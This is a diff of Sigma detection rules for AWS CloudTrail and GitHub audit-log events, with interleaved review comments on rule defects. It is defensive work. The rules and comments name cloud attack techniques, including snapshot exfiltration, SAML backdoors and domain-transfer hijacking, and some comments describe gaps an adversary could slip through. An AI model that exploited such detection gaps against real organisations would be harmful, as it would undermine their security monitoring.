@@ -1,24 +1,24 @@ title: AWS RDS Master Password Change id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 -status: experimental +status: test description: Detects the change of database master password. It may be a part of data exfiltration. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +modified: 2022/10/05 +tags: + - attack.exfiltration + - attack.t1020 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: rds.amazonaws.com - responseElements.pendingModifiedValues.masterUserPassword: '*' + responseElements.pendingModifiedValues.masterUserPassword|contains: '*' eventName: ModifyDBInstance condition: selection_source falsepositives: - Benign changes to a db instance level: medium -tags: - - attack.exfiltration - - attack.t1020 diff --git a/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml b/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml index dbc413919..597a66a6f 100644 --- a/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml +++ b/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml 
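Review bot: In Sigma an unescaped `*` is a wildcard, so `masterUserPassword|contains: '*'` still means "field present with any value", exactly what the old `masterUserPassword: '*'` expressed, while the `contains` modifier now hands backends a lone-wildcard pattern that some translate awkwardly (e.g. to `.*.*.*`) — it adds translation risk without changing what is matched. If the intent is field presence, revert to `responseElements.pendingModifiedValues.masterUserPassword: '*'` (or the `exists` modifier, if this project's converter supports it); if the intent is the literal masking CloudTrail writes into the response, the asterisk has to be escaped, e.g. `|contains: '\*'`. Either way a one-line comment stating which of the two is meant would stop the next contributor from flipping it back.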
@@ -1,12 +1,15 @@ title: Restore Public AWS RDS Instance id: c3f265c7-ff03-4056-8ab2-d486227b4599 -status: experimental +status: test description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1020 logsource: product: aws service: cloudtrail @@ -19,6 +22,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.exfiltration - - attack.t1020 diff --git a/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml b/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml index 14bbc35e5..5470622d7 100644 --- a/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml +++ b/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml 
@@ -1,24 +1,24 @@ title: AWS Root Credentials id: 8ad1600d-e9dc-4251-b0ee-a65268f29add -status: experimental +status: test description: Detects AWS root account usage +references: + - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html author: vitaliy0x1 date: 2020/01/21 -modified: 2021/08/09 -references: - - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html +modified: 2022/10/09 +tags: + - attack.privilege_escalation + - attack.t1078.004 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection_usertype: - userIdentity.type: Root - selection_eventtype: - eventType: AwsServiceEvent - condition: selection_usertype and not selection_eventtype + selection_usertype: + userIdentity.type: Root + selection_eventtype: + eventType: AwsServiceEvent + condition: selection_usertype and not selection_eventtype falsepositives: - - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html + - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html level: medium -tags: - - attack.privilege_escalation - - attack.t1078.004 diff --git a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml index 9e6219023..bf738eff0 100644 --- a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml +++ b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml 
@@ -1,13 +1,18 @@ title: AWS Route 53 Domain Transfer Lock Disabled id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 +status: test description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. -author: Elastic, Austin Songer @austinsonger -status: experimental -date: 2021/07/22 references: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html +author: Elastic, Austin Songer @austinsonger +date: 2021/07/22 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 logsource: product: aws service: cloudtrail 
@@ -16,10 +21,6 @@ detection: eventSource: route53.amazonaws.com eventName: DisableDomainTransferLock condition: selection -level: low -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 falsepositives: -- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml index 69302a914..599badbcd 100644 --- a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml +++ b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml 
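Review bot: `DisableDomainTransferLock` is a Route 53 Domains operation (the third reference is the `API_domains_` page), and CloudTrail records Route 53 Domains calls with `eventSource: route53domains.amazonaws.com` rather than `route53.amazonaws.com`, so the context line `eventSource: route53.amazonaws.com` means this selection should never match — verify against a sample event, but I would change it to `eventSource: route53domains.amazonaws.com` while the metadata is being reshuffled anyway. A removed transfer lock is the precondition for registrar-level domain hijacking, so `level: low` also looks generous for an action the description itself says to refrain from.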
@@ -1,11 +1,16 @@ title: AWS Route 53 Domain Transferred to Another Account id: b056de1a-6e6e-4e40-a67e-97c9808cf41b +status: test description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. +references: + - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml author: Elastic, Austin Songer @austinsonger -status: experimental date: 2021/07/22 -references: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +modified: 2022/10/09 +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 logsource: product: aws service: cloudtrail @@ -14,10 +19,6 @@ detection: eventSource: route53.amazonaws.com eventName: TransferDomainToAnotherAwsAccount condition: selection -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 falsepositives: -- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low diff --git a/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml b/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml index 2080b16d0..393dbbc73 100644 
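Review bot: `TransferDomainToAnotherAwsAccount` belongs to the Route 53 Domains API, which CloudTrail logs under `eventSource: route53domains.amazonaws.com`, so with the context line `eventSource: route53.amazonaws.com` in the second hunk the rule is unlikely ever to fire; confirm on a real event and fix the event source here rather than only moving tags around. A transfer initiated this way also has accept and cancel counterparts on the Route 53 Domains API; if the maintainers want the full lifecycle, the `eventName` could become a list covering those as well.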
--- a/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml +++ b/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml @@ -1,10 +1,7 @@ title: AWS S3 Data Management Tampering -id: 78b3756a-7804-4ef7-8555-7b9024a02d2d +id: 78b3756a-7804-4ef7-8555-7b9024a02e2d +status: test description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html @@ -13,6 +10,12 @@ references: - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1537 logsource: product: aws service: cloudtrail 
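Review bot: The rule `id` changes from `78b3756a-7804-4ef7-8555-7b9024a02d2d` to `78b3756a-7804-4ef7-8555-7b9024a02e2d`, which silently breaks anything keyed on the old id — deployed detections, suppression lists, ticket references — and Sigma's convention for this is to keep the old id reachable through `related:` with `type: renamed`, the same mechanism aws_enum_buckets in this patch uses with `type: similar`. If the change is deliberate (presumably resolving a duplicate id), add `related:` / `- id: 78b3756a-7804-4ef7-8555-7b9024a02d2d` / `type: renamed` and note it in the commit message; if not, keep the original id.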
@@ -20,17 +23,14 @@ detection: selection: eventSource: s3.amazonaws.com eventName: - - PutBucketLogging - - PutBucketWebsite - - PutEncryptionConfiguration - - PutLifecycleConfiguration - - PutReplicationConfiguration - - ReplicateObject - - RestoreObject + - PutBucketLogging + - PutBucketWebsite + - PutEncryptionConfiguration + - PutLifecycleConfiguration + - PutReplicationConfiguration + - ReplicateObject + - RestoreObject condition: selection -level: low -tags: - - attack.exfiltration - - attack.t1537 falsepositives: -- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml b/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml index 2a5361e0f..a32ca6486 100644 --- a/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml +++ b/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml @@ -2,10 +2,10 @@ title: AWS SecurityHub Findings Evasion id: a607e1fe-74bf-4440-a3ec-b059b9103157 status: stable description: Detects the modification of the findings on SecurityHub. -author: Sittikorn S -date: 2021/06/28 references: - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ +author: Sittikorn S +date: 2021/06/28 tags: - attack.defense_evasion - attack.t1562 
@@ -16,10 +16,10 @@ detection: selection: eventSource: securityhub.amazonaws.com eventName: - - 'BatchUpdateFindings' - - 'DeleteInsight' - - 'UpdateFindings' - - 'UpdateInsight' + - 'BatchUpdateFindings' + - 'DeleteInsight' + - 'UpdateFindings' + - 'UpdateInsight' condition: selection fields: - sourceIPAddress diff --git a/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml b/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml index 11ddcf8b4..ced4493a5 100644 --- a/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml +++ b/src/main/resources/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml @@ -2,23 +2,22 @@ title: AWS Snapshot Backup Exfiltration id: abae8fec-57bd-4f87-aff6-6e3db989843d status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account +references: + - https://www.justice.gov/file/1080281/download author: Darin Smith date: 2021/05/17 modified: 2021/08/19 -references: - - https://www.justice.gov/file/1080281/download - - https://attack.mitre.org/techniques/T1537/ +tags: + - attack.exfiltration + - attack.t1537 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection_source: - eventSource: ec2.amazonaws.com - eventName: ModifySnapshotAttribute - condition: selection_source + selection_source: + eventSource: ec2.amazonaws.com + eventName: ModifySnapshotAttribute + condition: selection_source falsepositives: - - Valid change to a snapshot's permissions + - Valid change to a snapshot's permissions level: medium -tags: - - attack.exfiltration - - attack.t1537 diff --git a/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml b/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml new file mode 100644 index 000000000..b299af75d --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml 
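Review bot: The snapshot rule's description promises detection of permissions changed "to enable access from another account", but the selection fires on every `ModifySnapshotAttribute`, including removal of a share or a product-code update, so the medium alert also covers clean-up. If this project's CloudTrail mapping exposes request parameters, narrowing on the share itself — presumably `requestParameters.createVolumePermission.add` with a `userId`, or `group: all` for a public share — would make the alert match its own description; confirm the key path against a sample event before committing to it. Dropping the attack.mitre.org link in favour of the tag is fine, but the only remaining reference is a DOJ indictment PDF, which tells an analyst nothing about the API; a link to the ModifySnapshotAttribute API reference would restore that.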
@@ -0,0 +1,32 @@
+title: AWS Identity Center Identity Provider Change
+id: d3adb3ef-b7e7-4003-9092-1924c797db35
+status: experimental
+description: |
+ Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.
+ A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
+references:
+ - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html
+ - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html
+ - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html
+author: Michael McIntyre @wtfender
+date: 2023/09/27
+tags:
+ - attack.persistence
+ - attack.t1556
+logsource:
+ product: aws
+ service: cloudtrail
+detection:
+ selection:
+ eventSource:
+ - 'sso-directory.amazonaws.com'
+ - 'sso.amazonaws.com'
+ eventName:
+ - 'AssociateDirectory'
+ - 'DisableExternalIdPConfigurationForDirectory'
+ - 'DisassociateDirectory'
+ - 'EnableExternalIdPConfigurationForDirectory'
+ condition: selection
+falsepositives:
+ - Authorized changes to the AWS account's identity provider
+level: high
diff --git a/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml b/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml
index 1f6b76ae1..bc0615dcf 100644
--- a/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml
+++ b/src/main/resources/rules/cloudtrail/aws_sts_assumerole_misuse.yml
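Review bot: The `eventName` list covers directory association and toggling the external IdP on and off, but the quieter attack — replacing the SAML metadata or signing certificate of an IdP that is already enabled — goes through the update action for the same configuration (`UpdateExternalIdPConfigurationForDirectory` under `sso-directory` in the linked service-authorization reference, if I read it right) and is not matched, so an adversary who swaps the certificate rather than disabling/enabling walks past a high-severity rule. I would add that event to the list and double-check the exact action name against the reference. Since every hit is `level: high`, the `falsepositives` entry would be more useful if it named the discriminator analysts should apply, e.g. `- Authorized IdP changes, which should correlate with a change ticket and a known administrator principal`.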
@@ -1,13 +1,19 @@ title: AWS STS AssumeRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 +status: test description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/20 references: - https://github.com/elastic/detection-rules/pull/1214 - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 logsource: product: aws service: cloudtrail @@ -16,14 +22,8 @@ detection: userIdentity.type: AssumedRole userIdentity.sessionContext.sessionIssuer.type: Role condition: selection -level: low -tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 falsepositives: - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml b/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml index 340e41bc6..817c97a06 100644 --- a/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml +++ b/src/main/resources/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml 
@@ -1,12 +1,19 @@ title: AWS STS GetSessionToken Misuse id: b45ab1d2-712f-4f01-a751-df3826969807 +status: test description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 references: - https://github.com/elastic/detection-rules/pull/1213 - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 logsource: product: aws service: cloudtrail @@ -16,12 +23,6 @@ detection: eventName: GetSessionToken userIdentity.type: IAMUser condition: selection -level: low -tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 falsepositives: -- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml b/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml index 08eabe4ce..531596e17 100644 --- a/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml +++ b/src/main/resources/rules/cloudtrail/aws_susp_saml_activity.yml 
@@ -1,24 +1,13 @@ title: AWS Suspicious SAML Activity id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +status: test description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. -author: Austin Songer -status: experimental -date: 2021/09/22 references: - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html -logsource: - product: aws - service: cloudtrail -detection: - selection1: - eventSource: sts.amazonaws.com - eventName: AssumeRoleWithSAML - selection2: - eventSource: iam.amazonaws.com - eventName: UpdateSAMLProvider - condition: selection1 or selection2 -level: medium +author: Austin Songer +date: 2021/09/22 +modified: 2022/12/18 tags: - attack.initial_access - attack.t1078 
@@ -27,7 +16,19 @@ tags: - attack.privilege_escalation - attack.t1550 - attack.t1550.001 +logsource: + product: aws + service: cloudtrail +detection: + selection_sts: + eventSource: 'sts.amazonaws.com' + eventName: 'AssumeRoleWithSAML' + selection_iam: + eventSource: 'iam.amazonaws.com' + eventName: 'UpdateSAMLProvider' + condition: 1 of selection_* falsepositives: - - Automated processes that uses Terraform may lead to false positives. - - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Automated processes that uses Terraform may lead to false positives. + - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml b/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml index acaebd91d..32f2cd365 100644 --- a/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml +++ b/src/main/resources/rules/cloudtrail/aws_update_login_profile.yml 
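Review bot: With `condition: 1 of selection_*`, every `AssumeRoleWithSAML` — that is, every ordinary federated sign-in — raises a medium alert, so in an SSO-enabled account this rule fires on the normal login path and the actual backdoor signal, `UpdateSAMLProvider`, is buried in that volume. I would keep `selection_iam` at medium and either drop `selection_sts` or move it to its own low-level rule scoped to unfamiliar principals or source IPs. Planting a new provider (`CreateSAMLProvider`) and removing one to cover tracks (`DeleteSAMLProvider`) are the other half of the "backdoor access via SAML" the description mentions and are absent here; turning `eventName: 'UpdateSAMLProvider'` into a list with those two would close that gap.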
@@ -1,13 +1,17 @@ title: AWS User Login Profile Was Modified id: 055fb148-60f8-462d-ad16-26926ce050f1 -status: experimental +status: test description: | - An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. - With this alert, it is used to detect anyone is changing password on behalf of other users. -author: toffeebr33k -date: 2021/08/09 + An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. + With this alert, it is used to detect anyone is changing password on behalf of other users. references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation +author: toffeebr33k +date: 2021/08/09 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 logsource: product: aws service: cloudtrail @@ -26,6 +30,3 @@ fields: falsepositives: - Legit User Account Administration level: high -tags: - - attack.persistence - - attack.t1098 diff --git a/src/main/resources/rules/github/github_delete_action_invoked.yml b/src/main/resources/rules/github/github_delete_action_invoked.yml index 7b8e610ba..15a7e5e9f 100644 --- a/src/main/resources/rules/github/github_delete_action_invoked.yml +++ b/src/main/resources/rules/github/github_delete_action_invoked.yml @@ -1,8 +1,8 @@ title: Github Delete Action Invoked id: 16a71777-0b2e-4db7-9888-9d59cb75200b -status: experimental +status: test description: Detects delete action in the Github audit logs for codespaces, environment, project and repo. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/19 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions 
@@ -22,11 +22,6 @@ detection: - 'project.delete' - 'repo.destroy' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - - Validate the deletion activity is permitted. The "actor" field need to be validated. + - Validate the deletion activity is permitted. The "actor" field need to be validated. level: medium diff --git a/src/main/resources/rules/github/github_disable_high_risk_configuration.yml b/src/main/resources/rules/github/github_disable_high_risk_configuration.yml index 9a657fd34..63dde5985 100644 --- a/src/main/resources/rules/github/github_disable_high_risk_configuration.yml +++ b/src/main/resources/rules/github/github_disable_high_risk_configuration.yml @@ -1,8 +1,8 @@ title: Github High Risk Configuration Disabled id: 8622c92d-c00e-463c-b09d-fd06166f6794 -status: experimental +status: test description: Detects when a user disables a critical security feature for an organization. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/29 references: - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization @@ -20,21 +20,11 @@ logsource: detection: selection: action: + - 'org.advanced_security_policy_selected_member_disabled' - 'org.disable_oauth_app_restrictions' - 'org.disable_two_factor_requirement' - 'repo.advanced_security_disabled' - - 'org.advanced_security_policy_selected_member_disabled' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - - Approved administrator/owner activities. + - Approved administrator/owner activities. level: high 
diff --git a/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml b/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml index 02052af78..a6ab69436 100644 --- a/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml +++ b/src/main/resources/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml @@ -1,10 +1,10 @@ title: Outdated Dependency Or Vulnerability Alert Disabled id: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d -status: experimental +status: test description: | Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/27 references: - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts @@ -19,22 +19,12 @@ logsource: detection: selection: action: - - 'dependabot_alerts.disable' - 'dependabot_alerts_new_repos.disable' - - 'dependabot_security_updates.disable' + - 'dependabot_alerts.disable' - 'dependabot_security_updates_new_repos.disable' + - 'dependabot_security_updates.disable' - 'repository_vulnerability_alerts.disable' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes. level: high diff --git a/src/main/resources/rules/github/github_new_org_member.yml b/src/main/resources/rules/github/github_new_org_member.yml index 384d64330..ac17b72bd 100644 --- a/src/main/resources/rules/github/github_new_org_member.yml +++ b/src/main/resources/rules/github/github_new_org_member.yml 
@@ -1,8 +1,8 @@ title: New Github Organization Member Added id: 3908d64a-3c06-4091-b503-b3a94424533b -status: experimental +status: test description: Detects when a new member is added or invited to a github organization. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/29 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions @@ -19,16 +19,6 @@ detection: - 'org.add_member' - 'org.invite_member' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - - Organization approved new members + - Organization approved new members level: informational diff --git a/src/main/resources/rules/github/github_new_secret_created.yml b/src/main/resources/rules/github/github_new_secret_created.yml index 105a8b6d0..f5741c620 100644 --- a/src/main/resources/rules/github/github_new_secret_created.yml +++ b/src/main/resources/rules/github/github_new_secret_created.yml @@ -1,8 +1,8 @@ title: Github New Secret Created id: f9405037-bc97-4eb7-baba-167dad399b83 -status: experimental +status: test description: Detects when a user creates action secret for the organization, environment, codespaces or repository. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions 
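Review bot: The reference for the New Github Organization Member Added rule points at the `#dependabot_alerts-category-actions` anchor, which documents a different audit-log category than the `org.add_member`/`org.invite_member` actions this rule matches. The link is unchanged context, but the hunk already rewrites the surrounding header, so it is a natural place to correct it. Point the URL at the org category section of the same reviewing-the-audit-log page instead.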
@@ -19,16 +19,11 @@ logsource: detection: selection: action: - - 'org.create_actions_secret' - - 'environment.create_actions_secret' - 'codespaces.create_an_org_secret' + - 'environment.create_actions_secret' + - 'org.create_actions_secret' - 'repo.create_actions_secret' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor". + - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor". level: low diff --git a/src/main/resources/rules/github/github_outside_collaborator_detected.yml b/src/main/resources/rules/github/github_outside_collaborator_detected.yml index fbd16b49e..3fa79ec55 100644 --- a/src/main/resources/rules/github/github_outside_collaborator_detected.yml +++ b/src/main/resources/rules/github/github_outside_collaborator_detected.yml @@ -1,9 +1,9 @@ title: Github Outside Collaborator Detected id: eaa9ac35-1730-441f-9587-25767bde99d7 -status: experimental +status: test description: | Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/20 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions 
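Review bot: The rewritten falsepositives line still carries the typo `cloud be noisy`; since the commit already re-indents that line, it should read `- This detection could be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor".` The entry is the only tuning guidance an analyst sees for this low-level rule, so the wording is worth getting right.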
